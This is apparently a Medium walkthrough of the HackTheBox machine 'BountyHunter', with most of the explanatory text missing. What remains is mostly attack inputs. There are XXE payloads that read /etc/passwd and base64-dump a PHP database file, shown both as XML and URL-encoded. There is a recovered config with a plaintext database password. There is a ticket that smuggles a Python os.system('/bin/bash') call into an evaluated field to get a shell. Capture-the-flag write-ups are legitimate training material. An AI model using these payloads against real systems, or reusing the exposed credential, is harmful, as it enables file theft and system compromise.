BountyHunter Walkthrough: HackTheBox Writeup

Reconnaissance

Discovery and Scanning

Enumeration

<?xml  version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<bugreport>
<title>&xxe;</title>
<cwe>2</cwe>
<cvss>3</cvss>
<reward>4</reward>
</bugreport>
%50%44%39%34%62%57%77%67%49%48%5a%6c%63%6e%4e%70%62%32%34%39%49%6a%45%75%4d%43%49%67%5a%57%35%6a%62%32%52%70%62%6d%63%39%49%6b%6c%54%54%79%30%34%4f%44%55%35%4c%54%45%69%50%7a%34%38%49%55%52%50%51%31%52%5a%55%45%55%67%5a%6d%39%76%49%46%73%67%50%43%46%46%54%45%56%4e%52%55%35%55%49%47%5a%76%62%79%42%42%54%6c%6b%67%50%67%6f%67%49%43%41%67%49%43%41%67%49%44%77%68%52%55%35%55%53%56%52%5a%49%48%68%34%5a%53%42%54%57%56%4e%55%52%55%30%67%49%6d%5a%70%62%47%55%36%4c%79%38%76%5a%58%52%6a%4c%33%42%68%63%33%4e%33%5a%43%49%67%50%6c%30%2b%43%67%6b%4a%50%47%4a%31%5a%33%4a%6c%63%47%39%79%64%44%34%4b%43%51%6b%38%64%47%6c%30%62%47%55%2b%4a%6e%68%34%5a%54%73%38%4c%33%52%70%64%47%78%6c%50%67%6f%4a%43%54%78%6a%64%32%55%2b%4d%6a%77%76%59%33%64%6c%50%67%6f%4a%43%54%78%6a%64%6e%4e%7a%50%6a%4d%38%4c%32%4e%32%63%33%4d%2b%43%67%6b%4a%50%48%4a%6c%64%32%46%79%5a%44%34%30%50%43%39%79%5a%58%64%68%63%6d%51%2b%43%67%6b%4a%50%43%39%69%64%57%64%79%5a%58%42%76%63%6e%51%2b
<?xml version=”1.0" encoding=”ISO-8859–1"?><!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM “php://filter/convert.base64-encode/resource=/var/www/html/db.php” >]>
<bugreport>
<title>&xxe;</title>
<cwe>2</cwe>
<cvss>3</cvss>
<reward>4</reward>
</bugreport>
%50%44%39%34%62%57%77%67%49%48%5a%6c%63%6e%4e%70%62%32%34%39%49%6a%45%75%4d%43%49%67%5a%57%35%6a%62%32%52%70%62%6d%63%39%49%6b%6c%54%54%79%30%34%4f%44%55%35%4c%54%45%69%50%7a%34%38%49%55%52%50%51%31%52%5a%55%45%55%67%5a%6d%39%76%49%46%73%67%50%43%46%46%54%45%56%4e%52%55%35%55%49%47%5a%76%62%79%42%42%54%6c%6b%67%50%67%6f%67%49%43%41%67%49%43%41%67%49%44%77%68%52%55%35%55%53%56%52%5a%49%48%68%34%5a%53%42%54%57%56%4e%55%52%55%30%67%49%6e%42%6f%63%44%6f%76%4c%32%5a%70%62%48%52%6c%63%69%39%6a%62%32%35%32%5a%58%4a%30%4c%6d%4a%68%63%32%55%32%4e%43%31%6c%62%6d%4e%76%5a%47%55%76%63%6d%56%7a%62%33%56%79%59%32%55%39%4c%33%5a%68%63%69%39%33%64%33%63%76%61%48%52%74%62%43%39%6b%59%69%35%77%61%48%41%69%49%44%35%64%50%67%6f%4a%43%54%78%69%64%57%64%79%5a%58%42%76%63%6e%51%2b%43%67%6b%4a%50%48%52%70%64%47%78%6c%50%69%5a%34%65%47%55%37%50%43%39%30%61%58%52%73%5a%54%34%4b%43%51%6b%38%59%33%64%6c%50%6a%49%38%4c%32%4e%33%5a%54%34%4b%43%51%6b%38%59%33%5a%7a%63%7a%34%7a%50%43%39%6a%64%6e%4e%7a%50%67%6f%4a%43%54%78%79%5a%58%64%68%63%6d%51%2b%4e%44%77%76%63%6d%56%33%59%58%4a%6b%50%67%6f%4a%43%54%77%76%59%6e%56%6e%63%6d%56%77%62%33%4a%30%50%67%3d%3d
<?php
// TODO -> Implement login system with the database.
$dbserver = “localhost”;
$dbname = “bounty”;
$dbusername = “admin”;
$dbpassword = “m19RoAU0hP41A1sTsq6K”;
$testuser = “test”;
?>
# Skytrain Inc
## Ticket to abc
__Ticket Code:__ abc
**102+ 10 == 112 and __import__(‘os’).system(‘/bin/bash’) == False

References

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store